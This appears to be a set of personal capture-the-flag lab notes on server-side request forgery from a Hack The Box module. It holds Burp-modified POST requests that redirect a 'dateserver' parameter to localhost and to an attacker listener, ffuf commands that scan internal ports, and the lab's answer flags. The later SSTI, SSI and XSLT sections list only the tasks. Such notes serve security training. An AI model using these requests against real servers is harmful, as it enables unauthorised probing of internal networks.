SERVER-SIDE ATTACKS

IDENTIFYING SSRF

Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:80&date=2024-01-02
   - change the port number to determine which ports are closed; the error message is then
     used to identify open/closed services via ffuf
      - "Failed to connect..."
   
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"
 * -fr means filter regexp
 * 80   [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
   3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
   8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]

BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:8000&date=2024-01-02

 * HTB{911fc5badf7d65aed95380d536c270f8}

EXPLOITING SSRF

Exploit the SSRF vulnerability to identify an additional endpoint. Access that endpoint to obtain the flag
#identify potential SSRF vulnerability
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
 Response
  ...
  HTTP/1.1 200 OK
   - valid SSRF identified
   
#perform page fuzzing
#determine the web server's response on a non-existing page
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/invalidPage.php&date=2024-01-02
   -  a "404 not found" error msg could be used, but it won't filter any HTTP 403 responses
      to do so, use "Server at dateserver.htb Port 80"

root@oco:~$ ffuf -w directory-list-2.3-small.txt -u http://10.129.130.198/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80" -e .php -v -ic -t 100
 * HTB{61ea58507c2b9da30465b9582d6782a1}

BLIND SSRF

Exploit the SSRF to identify open ports on the system. Which port is open in addition to port 80?
#identify blind ssrf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  Date is unavailable. Choose a different date!
  
#verifying blind SSRF with Nectcat
root@oco:~$ nc -nlvp 8080

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://{attackerIP:port}&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else

root@oco:~$ ...Netcat connection  
 connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
 GET /index.php HTTP/1.1
 Host: 172.17.0.1:8000
 Accept: */*
#open/close port enumeration
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

#identify closed ports
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:81&date=2024-01-02
   - the error msgs on closed ports is used by ffuf to identify open ports
      - "Something went wrong..."
          - the error msgs between open/closed ports will be different

#identify open ports
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:80&date=2024-01-02
   - change the port number to determine which ports are closed
      - the error msgs on closed ports is used by ffuf to identify open ports
         - "Date is unavailable. Choose a different date..."
             - the error msgs between open/closed ports will be different

#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://10.129.146.231/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Something went wrong"
 * -fr means filter regexp
 * 80    [Status: 200, Size: 52, Words: 8, Lines: 1, Duration: 8ms]
   5000  [Status: 200, Size: 52, Words: 8, Lines: 1, Duration: 12ms]

IDENTIFYING SSTI

Apply what you learned in this section and identify the Template Engine used by the web application. Provide the name of the template engine as the answer.

EXPLOITING JINJA2 SSTI

Exploit the SSTI vulnerability to obtain RCE and read the flag.

EXPLOITING TWIG SSTI

Exploit the SSTI vulnerability to obtain RCE and read the flag.

EXPLOITING SSI INJECTION

Exploit the SSI Injection vulnerability to obtain RCE and read the flag.

EXPLOITING XLST INJECTION

Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.
PreviousFILE UPLOAD ATTACKSNextLOGIN BRUTE FORCING

Last updated